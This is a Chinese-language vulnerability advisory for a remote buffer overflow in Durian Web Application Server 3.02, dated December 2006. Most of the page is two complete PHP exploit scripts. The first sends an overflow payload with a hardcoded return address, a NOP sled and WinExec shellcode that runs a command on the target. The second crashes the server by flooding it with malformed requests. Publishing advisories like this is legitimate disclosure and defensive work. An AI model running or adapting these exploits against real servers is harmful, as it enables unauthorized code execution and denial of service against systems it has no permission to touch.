安全研究
安全漏洞
Durian Web应用服务器远程溢出漏洞
发布日期:2006-12-29
更新日期:2006-12-30
受影响系统:
Durian Web Application Server 3.02描述:
BUGTRAQ ID: 21808
Durian是一款免费的Web应用服务器,用于以APS或DWS语言生成交互的动态Web内容。
Durian在处理恶意畸形请求时存在缓冲区溢出漏洞,远程攻击者可以利用此漏洞导致拒绝服务或执行任意指令。
<*来源:rgod (rgod@autistici.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Durian Web Application Server 3.02 freeware for Win32 buffer
overflow execute command exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
tested against xp sp2 ita
software site -> http://sourceforge.net/projects/durian/
*/
error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";
$shellcode =
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"cmd.exe /c start notepad & ";
//$eip="\x72\xe0\xf1\x00";//DEP disabled
$eip="\x72\xe0\xf2\x00";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
for ($j=0; $j<count($ch); $j++){
for ($i=0; $i<count($size); $i++){
$junk="";
if (($j==2) and ($i==7)){
$junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX";
$junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu";
$junk.=$eip; //jmp shellcode
for ($n=1; $n<=100; $n++){
$junk.="\x90";
}
$junk.=$shellcode;
for ($n=1; $n=(2300-strlen($junk)); $n++){
$junk.="\x90";
}
}
else {
for ($k=1; $k<=$size[$i]; $k++){
$junk.=$ch[$j];
}
}
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n");
}
$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n");
}
$in = $junk;
socket_write($socket, $in, strlen ($in));
socket_close($socket);
}
}
?>
==============================================================================================
<?php
//Durian Web Application Server 3.02 freeware for Win32 denial of service exploit
//this will merely show 1000 access violation boxes to screen
//software site -> http://sourceforge.net/projects/durian/
//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org
error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;
for ($m=1; $m<=$c; $m++){
for ($j=0; $j<3; $j++){
for ($i=0; $i<8; $i++){
$junk="";
for ($k=1; $k<=$size[$i]; $k++){
$junk.=$ch[$j];
}
echo "buf size:".$size[$i]."|char:".$ch[$j]."\n";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n");
}
$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n");
}
$in = $junk;
socket_write($socket, $in, strlen ($in));
socket_close($socket);
}
}
sleep(1);
}
?>
建议:
厂商补丁:
Durian
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/durian/
浏览次数:3084
严重程度:0(网友投票)
绿盟科技给您安全的保障